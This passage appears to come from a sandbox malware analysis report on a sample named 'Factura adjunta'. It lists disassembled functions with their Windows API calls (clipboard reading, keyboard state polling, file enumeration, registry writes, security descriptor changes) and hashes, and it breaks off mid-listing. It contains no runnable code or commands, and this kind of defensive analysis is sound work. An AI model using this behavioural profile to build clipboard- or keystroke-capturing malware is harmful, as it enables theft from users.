                            Function 0082425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(0083F910), ref: 00824284
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00824292
                            • GetClipboardData.USER32(0000000D), ref: 0082429A
                            • CloseClipboard.USER32 ref: 008242A6
                            • GlobalFix.KERNEL32(00000000), ref: 008242C2
                            • CloseClipboard.USER32 ref: 008242CC
                            • GlobalUnWire.KERNEL32(00000000), ref: 008242E1
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 008242EE
                            • GetClipboardData.USER32(00000001), ref: 008242F6
                            • GlobalFix.KERNEL32(00000000), ref: 00824303
                            • GlobalUnWire.KERNEL32(00000000), ref: 00824337
                            • CloseClipboard.USER32 ref: 00824447
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                            • String ID:
                            • API String ID: 941120096-0
                            • Opcode ID: 260fccf61324b71bd0ad714950a1a25df44454682b7832cfb204727c31cedb62
                            • Instruction ID: a37a6a09a85918d9a22f8619b93b00631d95f801722dd0ba8fa3586c73d167f6
                            • Opcode Fuzzy Hash: 260fccf61324b71bd0ad714950a1a25df44454682b7832cfb204727c31cedb62
                            • Instruction Fuzzy Hash: C4518171204215EBD301FF64EC8AFAF77A8FF94B00F104929F655D21A2DB74D9448BA2
                            Function 0081C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0081C9F8
                            • FindClose.KERNEL32(00000000), ref: 0081CA4C
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081CA71
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081CA88
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0081CAAF
                            • __swprintf.LIBCMT ref: 0081CAFB
                            • __swprintf.LIBCMT ref: 0081CB3E
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                            • __swprintf.LIBCMT ref: 0081CB92
                              • Part of subcall function 007D38D8: __woutput_l.LIBCMT ref: 007D3931
                            • __swprintf.LIBCMT ref: 0081CBE0
                              • Part of subcall function 007D38D8: __flsbuf.LIBCMT ref: 007D3953
                              • Part of subcall function 007D38D8: __flsbuf.LIBCMT ref: 007D396B
                            • __swprintf.LIBCMT ref: 0081CC2F
                            • __swprintf.LIBCMT ref: 0081CC7E
                            • __swprintf.LIBCMT ref: 0081CCCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 3953360268-2428617273
                            • Opcode ID: 149fffaf91f060aa922cf44dd36991c2452e213c69eba41478c0e4bc0c5f181f
                            • Instruction ID: 31103fa27ffc43edd4113815bddb165b144a223498e19b81f4039ba997eb10b2
                            • Opcode Fuzzy Hash: 149fffaf91f060aa922cf44dd36991c2452e213c69eba41478c0e4bc0c5f181f
                            • Instruction Fuzzy Hash: 35A11DB1508305EBC704EF64D88AEEFB7ECFF94700F444919B695D6191EA38DA48CB62
                            Function 0081F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0081F221
                            • _wcscmp.LIBCMT ref: 0081F236
                            • _wcscmp.LIBCMT ref: 0081F24D
                            • GetFileAttributesW.KERNEL32(?), ref: 0081F25F
                            • SetFileAttributesW.KERNEL32(?,?), ref: 0081F279
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0081F291
                            • FindClose.KERNEL32(00000000), ref: 0081F29C
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F2B8
                            • _wcscmp.LIBCMT ref: 0081F2DF
                            • _wcscmp.LIBCMT ref: 0081F2F6
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F308
                            • SetCurrentDirectoryW.KERNEL32(0086A5A0), ref: 0081F326
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F330
                            • FindClose.KERNEL32(00000000), ref: 0081F33D
                            • FindClose.KERNEL32(00000000), ref: 0081F34F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: e926e50580e9ac920b0c629de1e03de2f198ee40181f4df2d2bb9a83598b6185
                            • Instruction ID: df34ee7850573c38b2f1e65962504c31e107daef0cbd39568d2a889ce9d9ce56
                            • Opcode Fuzzy Hash: e926e50580e9ac920b0c629de1e03de2f198ee40181f4df2d2bb9a83598b6185
                            • Instruction Fuzzy Hash: F331EA76900219ABDB10DBB4DC48ADE73ACFF48360F100576FA25E32A2DB34DA85CE50
                            Function 00830AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830BDE
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0083F910,00000000,?,00000000,?,?), ref: 00830C4C
                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00830C94
                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00830D1D
                            • RegCloseKey.ADVAPI32(?), ref: 0083103D
                            • RegCloseKey.ADVAPI32(00000000), ref: 0083104A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 770c3671c5ffce2d0d5f7bdccbd984616426be29d3b1e3705d71d3c84dfa6b8a
                            • Instruction ID: 448a1e2c36dc7f92818be00e58e978eb08c908fb2c58f74681fe140cb5a3b5e3
                            • Opcode Fuzzy Hash: 770c3671c5ffce2d0d5f7bdccbd984616426be29d3b1e3705d71d3c84dfa6b8a
                            • Instruction Fuzzy Hash: B4022575200601DFCB14EF28C899A6AB7E5FF89714F04885DF99A9B362CB34EC41CB81
                            Function 0083C8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfilenativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • DragQueryPoint.SHELL32(?,?), ref: 0083C917
                              • Part of subcall function 0083ADF1: ClientToScreen.USER32(?,?), ref: 0083AE1A
                              • Part of subcall function 0083ADF1: GetWindowRect.USER32(?,?), ref: 0083AE90
                              • Part of subcall function 0083ADF1: PtInRect.USER32(?,?,0083C304), ref: 0083AEA0
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0083C980
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0083C98B
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0083C9AE
                            • _wcscat.LIBCMT ref: 0083C9DE
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0083C9F5
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0083CA0E
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0083CA25
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0083CA47
                            • DragFinish.SHELL32(?), ref: 0083CA4E
                            • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0083CB41
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$h)
                            • API String ID: 2166380349-923466672
                            • Opcode ID: 27ae9756615273a6250ded7f847a6e2287a7f273fa1886cb0d1b5a011d83b835
                            • Instruction ID: 8e093e9c3d8ca94c3f0dd8d1a9e323e5ab239504912d9829539a1a8a6ea6b73e
                            • Opcode Fuzzy Hash: 27ae9756615273a6250ded7f847a6e2287a7f273fa1886cb0d1b5a011d83b835
                            • Instruction Fuzzy Hash: 03616E71508300AFC701EF64CC89E9BBBE8FFC8750F00492DF695A61A1EB749949CB92
                            Function 0081F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0081F37E
                            • _wcscmp.LIBCMT ref: 0081F393
                            • _wcscmp.LIBCMT ref: 0081F3AA
                              • Part of subcall function 008145C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008145DC
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0081F3D9
                            • FindClose.KERNEL32(00000000), ref: 0081F3E4
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F400
                            • _wcscmp.LIBCMT ref: 0081F427
                            • _wcscmp.LIBCMT ref: 0081F43E
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F450
                            • SetCurrentDirectoryW.KERNEL32(0086A5A0), ref: 0081F46E
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F478
                            • FindClose.KERNEL32(00000000), ref: 0081F485
                            • FindClose.KERNEL32(00000000), ref: 0081F497
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: 53ce833c79f057885def2e84faeda46d6252f189576f720f8bf68f44ac7dfccc
                            • Instruction ID: 260f5fab462593a9c409dcc0f825d445c1c8a4495a2aadf44d47bd3c4c7b326a
                            • Opcode Fuzzy Hash: 53ce833c79f057885def2e84faeda46d6252f189576f720f8bf68f44ac7dfccc
                            • Instruction Fuzzy Hash: 9E31C9725012196BCB10DBA4DC88ADF77ACFF49364F140676EA54E32A2D734DA84CE94
                            Function 0083C49C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 229windownativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0083C4EC
                            • GetFocus.USER32 ref: 0083C4FC
                            • GetDlgCtrlID.USER32(00000000), ref: 0083C507
                            • _memset.LIBCMT ref: 0083C632
                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0083C65D
                            • GetMenuItemCount.USER32(?), ref: 0083C67D
                            • GetMenuItemID.USER32(?,00000000), ref: 0083C690
                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0083C6C4
                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0083C70C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0083C744
                            • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0083C779
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                            • String ID: 0$h)
                            • API String ID: 3616455698-2843282415
                            • Opcode ID: 404892dcf403d862e120e53c711ce34b9148e3cab07a9abc02718a474ad9aec4
                            • Instruction ID: bb769a60b251018fc5dbe1b25a0a48358eb9ee5ede069ec5996830864cfeb941
                            • Opcode Fuzzy Hash: 404892dcf403d862e120e53c711ce34b9148e3cab07a9abc02718a474ad9aec4
                            • Instruction Fuzzy Hash: AD814870608301AFD710DF28C985A6ABBE8FBD8354F00492DF999E7291D770E905CBA2
                            Function 008081F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0080874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00808766
                              • Part of subcall function 0080874A: GetLastError.KERNEL32(?,0080822A,?,?,?), ref: 00808770
                              • Part of subcall function 0080874A: GetProcessHeap.KERNEL32(00000008,?,?,0080822A,?,?,?), ref: 0080877F
                              • Part of subcall function 0080874A: RtlAllocateHeap.NTDLL(00000000,?,0080822A), ref: 00808786
                              • Part of subcall function 0080874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0080879D
                              • Part of subcall function 008087E7: GetProcessHeap.KERNEL32(00000008,00808240,00000000,00000000,?,00808240,?), ref: 008087F3
                              • Part of subcall function 008087E7: RtlAllocateHeap.NTDLL(00000000,?,00808240), ref: 008087FA
                              • Part of subcall function 008087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00808240,?), ref: 0080880B
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0080825B
                            • _memset.LIBCMT ref: 00808270
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0080828F
                            • GetLengthSid.ADVAPI32(?), ref: 008082A0
                            • GetAce.ADVAPI32(?,00000000,?), ref: 008082DD
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008082F9
                            • GetLengthSid.ADVAPI32(?), ref: 00808316
                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00808325
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0080832C
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0080834D
                            • CopySid.ADVAPI32(00000000), ref: 00808354
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00808385
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008083AB
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008083BF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                            • String ID:
                            • API String ID: 2347767575-0
                            • Opcode ID: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                            • Instruction ID: c2107c11e3fa06bcc243b0f3963c9c0b1713b4daa1de3b89b5d758eb31041805
                            • Opcode Fuzzy Hash: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                            • Instruction Fuzzy Hash: E4616771900209EFCF04DFA4DD85EAEBBB9FF44710F048529E955E6291DB319A45CBA0
                            Function 007C6843 Relevance: 19.6, Strings: 15, Instructions: 883COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa|$UCP)$UTF)$UTF16)
                            • API String ID: 0-1150882414
                            • Opcode ID: 081ae7222a4de702a01b4d887e1abed0bc1e784f5db89ef6c46c26249947ef24
                            • Instruction ID: 49e080708e1bb7d12365cdb69927d3081d2510e53269c95f37d339e006a8e4ca
                            • Opcode Fuzzy Hash: 081ae7222a4de702a01b4d887e1abed0bc1e784f5db89ef6c46c26249947ef24
                            • Instruction Fuzzy Hash: 76726E75E002199BDF64CF58C884BAEB7B5FF48320F14816EE945EB294EB749D81CB90
                            Function 00830665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00830038,?,?), ref: 008310BC
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830737
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008307D6
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0083086E
                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00830AAD
                            • RegCloseKey.ADVAPI32(00000000), ref: 00830ABA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: df5e64e3422a6d2730d2609354958470e5acce474168f47f279571b14c03b4cc
                            • Instruction ID: c6813a7bd912783d54b94c4460068ed97a593092f0e1b61f7f6d78144dba6361
                            • Opcode Fuzzy Hash: df5e64e3422a6d2730d2609354958470e5acce474168f47f279571b14c03b4cc
                            • Instruction Fuzzy Hash: 89E14C31604214AFCB14DF28C895E6ABBE8FF89714F04896DF959DB262DB34E901CF91
                            Function 00810219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00810241
                            • GetAsyncKeyState.USER32(000000A0), ref: 008102C2
                            • GetKeyState.USER32(000000A0), ref: 008102DD
                            • GetAsyncKeyState.USER32(000000A1), ref: 008102F7
                            • GetKeyState.USER32(000000A1), ref: 0081030C
                            • GetAsyncKeyState.USER32(00000011), ref: 00810324
                            • GetKeyState.USER32(00000011), ref: 00810336
                            • GetAsyncKeyState.USER32(00000012), ref: 0081034E
                            • GetKeyState.USER32(00000012), ref: 00810360
                            • GetAsyncKeyState.USER32(0000005B), ref: 00810378
                            • GetKeyState.USER32(0000005B), ref: 0081038A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 41b3f4840875d22f66f49b385bb7047997623c553d6c16580fda3e5b3927edd5
                            • Instruction ID: 937f6c98184b11c3375d66ce470cb658c953c130bc7a5f58b061c6fe315f57d7
                            • Opcode Fuzzy Hash: 41b3f4840875d22f66f49b385bb7047997623c553d6c16580fda3e5b3927edd5
                            • Instruction Fuzzy Hash: E141AB249047C9AEFF315B648C083E5BEA8FF16344F08455DD5D5C62C2D7E459C48F92
                            Function 0083D74C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windownativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • GetSystemMetrics.USER32(0000000F), ref: 0083D78A
                            • GetSystemMetrics.USER32(0000000F), ref: 0083D7AA
                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0083D9E5
                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0083DA03
                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0083DA24
                            • ShowWindow.USER32(00000003,00000000), ref: 0083DA43
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0083DA68
